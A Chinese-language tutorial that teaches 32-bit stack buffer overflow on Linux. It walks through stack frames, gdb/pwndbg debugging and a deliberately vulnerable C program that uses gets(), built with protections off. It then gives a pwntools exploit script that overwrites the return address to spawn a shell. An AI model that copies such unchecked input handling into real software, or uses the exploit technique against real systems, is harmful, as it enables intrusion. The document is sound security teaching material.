浅析栈溢出原理

最编程 2024-02-12 12:51:42

...

说明

本文主要讲解简单栈溢出的基本原理, 如果有什么不对的地方或者更好的建议, 还请大佬指正.

工具准备

linux系统
调试工具gdb
gdb插件:pwndbg
pwntools工具包
关于pwndbg插件和pwntools可以在github搜索并下载安装,需要python环境

函数栈帧与ESP、EBP寄存器

C语言中,每个栈帧对应一个未运行完的函数. 栈帧中保存了函数的局部变量和返回地址, 即保存着函数的执行环境.
------摘自百度百科

ESP寄存器保存着栈帧的栈顶地址, EBP寄存器保存着当前函数栈帧的栈底地址. (32位系统为ESP、EBP, 64位系统为RSP、RBP, 其它寄存器同理)

call指令、leave指令与ret指令

汇编语言中, 用call指令来实现函数的调用, 指令格式: call address;
call指令效果相当于"push eip; jump address;". 不仅是跳转到指定函数地址执行指令, 在跳转之前还将当前IP寄存器中的值(下一条指令的地址)压入到了栈中. 从而可以在被调函数执行完之后, 继续执行当前函数.
在被调函数执行完毕后, 程序要准备退出函数, 需要leave指令来释放函数栈帧, 并使EBP寄存器恢复旧值, 执行的操作相当于"mov esp,ebp; pop ebp; “, 之后ret指令将程序执行流返回上层函数. 有点c语言中return语句的意味. ret指令效果相当于"pop eip;”. 即将栈顶保存的值出栈, 作为下一条将要执行指令的地址赋值给IP寄存器.

造成栈溢出的原因

系统栈是由高地址往低地址增长的, 而数据的写入是按低地址到高地址的顺序写入. 如果程序没有对输入的字符数量做出限制, 就存在数据溢出当前栈帧以及覆盖返回地址的可能, 从而实现控制程序的执行流.

溢出原理

以32位可执行程序为例, 我们将通过调试分析下面这段简单的代码来理解栈溢出.

#include<stdio.h>
#include<unistd.h>

void shell(){
    system("/bin/sh");
}

void vulnerable(){
    char buf[16];
    gets(buf);
}

int main(){
    vulnerable();
}

可以看到buf大小只有16字节,而gets()函数却可以无限输入,不检查字符上限, 直到遇到’\n’字符为止.
我们将c文件编译链接成可执行文件:

# 编译参数先不讲解,在后面讲解保护机制时解释
# 只需知道-m32是将.c文件编译成32位程序即可
gcc -m32 -fno-stack-protector -no-pie main.c -o stack

我们用objdump 来反汇编一下生成的可执行文件(部分反汇编代码):

08049172 <shell>:
 8049172:       55                      push   ebp
 8049173:       89 e5                   mov    ebp,esp
 8049175:       83 ec 08                sub    esp,0x8
 8049178:       83 ec 0c                sub    esp,0xc
 804917b:       68 08 a0 04 08          push   0x804a008
 8049180:       e8 bb fe ff ff          call   8049040 <system@plt>
 8049185:       83 c4 10                add    esp,0x10
 8049188:       90                      nop
 8049189:       c9                      leave  
 804918a:       c3                      ret    

0804918b <vulnerable>:
 804918b:       55                      push   ebp
 804918c:       89 e5                   mov    ebp,esp
 804918e:       83 ec 18                sub    esp,0x18
 8049191:       83 ec 0c                sub    esp,0xc
 8049194:       8d 45 e8                lea    eax,[ebp-0x18]
 8049197:       50                      push   eax
 8049198:       e8 93 fe ff ff          call   8049030 <gets@plt>
 804919d:       83 c4 10                add    esp,0x10
 80491a0:       90                      nop
 80491a1:       c9                      leave  
 80491a2:       c3                      ret    

080491a3 <main>:
 80491a3:       55                      push   ebp
 80491a4:       89 e5                   mov    ebp,esp
 80491a6:       83 e4 f0                and    esp,0xfffffff0
 80491a9:       e8 dd ff ff ff          call   804918b <vulnerable>
 80491ae:       b8 00 00 00 00          mov    eax,0x0
 80491b3:       c9                      leave  
 80491b4:       c3                      ret    
 80491b5:       66 90                   xchg   ax,ax
 80491b7:       66 90                   xchg   ax,ax
 80491b9:       66 90                   xchg   ax,ax
 80491bb:       66 90                   xchg   ax,ax
 80491bd:       66 90                   xchg   ax,ax
 80491bf:       90                      nop

上图可以看到, 在执行call之前,系统会将参数入栈(32位程序如此), 执行call指令进入函数之后, 前两条汇编指令都相同:

55				push	ebp
89 e5			mov		ebp,esp

这两条指令的作用是将上层函数栈帧的栈底入栈,同时将栈顶作为本函数栈帧的栈底.
函数调用时栈的变化情况大致如下所示:
执行call指令时首先esp执行-4操作, 栈顶上移, 然后将call指令的下条指令地址存入栈顶位置, 从上图汇编代码可以看出是将地址0x80491ae入栈, 栈向低地址方向增长.
执行call指令时,将main函数中下条指令的地址入栈
进入vulnerable函数之后,分别执行前两条指令构造新栈帧:
将当前栈帧的ebp入栈, 然后将ebp移动到栈顶位置, 此时vulnerable函数的栈帧构造完毕,当有临时变量时, esp指针执行sub操作,指针上移, 为临时变量开辟栈空间.

函数功能执行完毕,准备返回时, 需要将栈空间释放, 即销毁当前栈帧, 在上面汇编代码部分可以看到, 用户定义的函数末尾通常会有两条指令(有时候没有leave指令):

c9			leave
c3			ret

执行leave指令, 首先将esp移动到栈帧的栈底ebp的位置, 之后执行出栈操作, 将栈顶赋值给ebp, 此时ebp恢复旧值, 因为出栈操作, esp指针下移. (出栈操作并不会清除栈内数据, 只是将esp的值修改了而已)

之后执行ret指令, 将栈顶赋值给IP寄存器 , esp下移, 程序继续. 所谓栈溢出就是想办法将上层函数的栈帧中的"返回地址"给覆盖掉, 以达到改变程序执行流的效果. 在本例中, 就是往buf中一直写入数据, 直到将main栈帧中"返回地址"给覆盖掉. 当程序执行完vulnerable函数后, 将返回到指定地址继续执行指令.
覆盖返回地址
接下来我们用动态调试工具gdb和pwndbg来调试此程序:
常用的gdb/pwndbg命令如下:

b function_name —> 在函数处下断点
b *address —> 在地址address处下断点
info b —> 查看断点信息
r —> 运行程序
n —> 单步步过
s —> 单步步入,函数跟踪
c —> 继续执行
fin —> 跳出,执行到函数返回处
stack n —> 查看栈内n个存储单元的数据

运行gdb, 并在main函数处打上断点, 运行程序:
可以看到最上面是一些寄存器的状态, 往下是程序执行处的反汇编代码, 小箭头指向将要执行指令, 接着是部分栈空间的状态, 包括ebp和esp的位置信息, 最下面是函数调用顺序, 可以看到程序执行时, main函数并不是第一个被调用的函数, 是由__libc_start_main调用.

Breakpoint 1, 0x080491a6 in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────
 EAX  0xf7fa7dc8 (environ) —▸ 0xffffbcbc —▸ 0xffffbe9f ◂— 'SHELL=/bin/bash'
 EBX  0x0
 ECX  0xcaf93e6a
 EDX  0xffffbc44 ◂— 0x0
 EDI  0xf7fa6000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1d9d6c
 ESI  0xf7fa6000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1d9d6c
 EBP  0xffffbc18 ◂— 0x0
 ESP  0xffffbc18 ◂— 0x0
 EIP  0x80491a6 (main+3) ◂— 0xe8f0e483
───────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────
 ► 0x80491a6 <main+3>     and    esp, 0xfffffff0
   0x80491a9 <main+6>     call   vulnerable <vulnerable>
 
   0x80491ae <main+11>    mov    eax, 0
   0x80491b3 <main+16>    leave  
   0x80491b4 <main+17>    ret    
 
   0x80491b5              nop    
   0x80491b7              nop    
   0x80491b9              nop    
   0x80491bb              nop    
   0x80491bd              nop    
   0x80491bf              nop    
───────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────
00:0000│ ebp esp  0xffffbc18 ◂— 0x0
01:0004│          0xffffbc1c —▸ 0xf7de6b41 (__libc_start_main+241) ◂— add    esp, 0x10
02:0008│          0xffffbc20 ◂— 0x1
03:000c│          0xffffbc24 —▸ 0xffffbcb4 —▸ 0xffffbe74 ◂— '/home/darkfox/Desktop/code_project/c/stack'
04:0010│          0xffffbc28 —▸ 0xffffbcbc —▸ 0xffffbe9f ◂— 'SHELL=/bin/bash'
05:0014│          0xffffbc2c —▸ 0xffffbc44 ◂— 0x0
06:0018│          0xffffbc30 ◂— 0x1
07:001c│          0xffffbc34 ◂— 0x0
─────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────
 ► f 0  80491a6 main+3
   f 1 f7de6b41 __libc_start_main+241
────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>

我们接着执行, 直到往buf输入数据为止:

 0x804918c <vulnerable+1>     mov    ebp, esp
   0x804918e <vulnerable+3>     sub    esp, 0x18
   0x8049191 <vulnerable+6>     sub    esp, 0xc
   0x8049194 <vulnerable+9>     lea    eax, [ebp - 0x18]
   0x8049197 <vulnerable+12>    push   eax
 ► 0x8049198 <vulnerable+13>    call   gets@plt <gets@plt>
        arg[0]: 0xffffbbf0 ◂— 0x1
        arg[1]: 0x40000
        arg[2]: 0x7
        arg[3]: 0x8049203 (__libc_csu_init+67) ◂— 0x8301c783
 
   0x804919d <vulnerable+18>    add    esp, 0x10
   0x80491a0 <vulnerable+21>    nop    
   0x80491a1 <vulnerable+22>    leave  
   0x80491a2 <vulnerable+23>    ret    
 
   0x80491a3 <main>             push   ebp

我们输入’aaaa’, 并查看栈数据, 可以看到我们输入的数据存储在地址0xffffbbf0处, 我们需要覆盖的数据在地址0xffffbc0c处, 中间相隔了0x1c字节的数据. 另外我们需要程序返回shell函数处, 运行shell函数, 获得系统控制权, 此时我们可以将shell函数的地址0x8049172覆盖原来的地址数据.然后就大功告成.

────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> stack 20
00:0000│ esp  0xffffbbe0 —▸ 0xffffbbf0 ◂— 'aaaa'
01:0004│      0xffffbbe4 ◂— 0x40000
02:0008│      0xffffbbe8 ◂— 0x7
03:000c│      0xffffbbec —▸ 0x8049203 (__libc_csu_init+67) ◂— 0x8301c783
04:0010│ eax  0xffffbbf0 ◂— 'aaaa'
05:0014│      0xffffbbf4 —▸ 0xffffbc00 —▸ 0xf7fe4520 (_dl_fini) ◂— push   ebp
06:0018│      0xffffbbf8 —▸ 0xffffbcbc —▸ 0xffffbe9f ◂— 'SHELL=/bin/bash'
07:001c│      0xffffbbfc —▸ 0x80491db (__libc_csu_init+27) ◂— 0xff10b38d
08:0020│      0xffffbc00 —▸ 0xf7fe4520 (_dl_fini) ◂— push   ebp
09:0024│      0xffffbc04 ◂— 0x0
0a:0028│ ebp  0xffffbc08 —▸ 0xffffbc18 ◂— 0x0
0b:002c│      0xffffbc0c —▸ 0x80491ae (main+11) ◂— 0xb8
0c:0030│      0xffffbc10 —▸ 0xf7fa6000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1d9d6c
... ↓
0e:0038│      0xffffbc18 ◂— 0x0
0f:003c│      0xffffbc1c —▸ 0xf7de6b41 (__libc_start_main+241) ◂— add    esp, 0x10
10:0040│      0xffffbc20 ◂— 0x1
11:0044│      0xffffbc24 —▸ 0xffffbcb4 —▸ 0xffffbe74 ◂— '/home/darkfox/Desktop/code_project/c/stack'
12:0048│      0xffffbc28 —▸ 0xffffbcbc —▸ 0xffffbe9f ◂— 'SHELL=/bin/bash'
13:004c│      0xffffbc2c —▸ 0xffffbc44 ◂— 0x0

用python编写漏洞利用脚本

#!/usr/bin/python3		#指明脚本解释程序

# 导入pwntools工具
from pwn import *

# 运行stack程序
io = process('./stack')

# shell函数返回地址
shell = 0x8049172

# 构造payload,先填充0x1c字节的垃圾数据,再覆盖返回地址
# pack()将整型数值打包成32位字节码,也可用 p32(shell) 代替
payload = b'a' * 0x1c + pack(shell,32)

#如果是python2, payload构造方式如下
#payload = 'a' * 0x1c + p32(shell)

# 向程序发送数据
io.sendline(payload)

#交互模式
io.interactive()

运行脚本后获得系统控制权限,执行ls命令,果然可以查看当前目录的文件

darkfox@darkfox-PC:~/Desktop/code_project/c$ python3 io.py 
[+] Starting local process './stack': pid 15404
[*] Switching to interactive mode
$ ls
how2heap  io.py  main.c  stack
$

那真对这种简单的栈溢出, 有什么防止的办法呢? 请查阅栈保护措施 canary机制、栈不可执行（NX）、地址随机化（PIE、ASLR）机制。

上一篇：从零开始学Pwn技巧1 - [理解栈溢出]入门篇

下一篇：如何设定及监控FreeRTOS任务堆栈容量，防止其溢出情况

浅析栈溢出原理

说明

工具准备

函数栈帧与ESP、EBP寄存器

call指令、leave指令与ret指令

造成栈溢出的原因

溢出原理

用python编写漏洞利用脚本

FCN原理浅析

摘要：大模型技术栈--算法和原理

轻松理解缓冲区溢出原理

JVM 内存溢出详解（栈溢出，堆溢出，持久代溢出、无法创建本地线程）

深入理解栈溢出（一）：原理与基础ROP攻击详解

详解栈溢出

理解栈溢出现象：比较与区别 - 二、栈满与栈内存超出

递归调用栈溢出

理解栈溢出、内存溢出与内存泄漏：它们之间的差异是什么？

栈溢出是什么？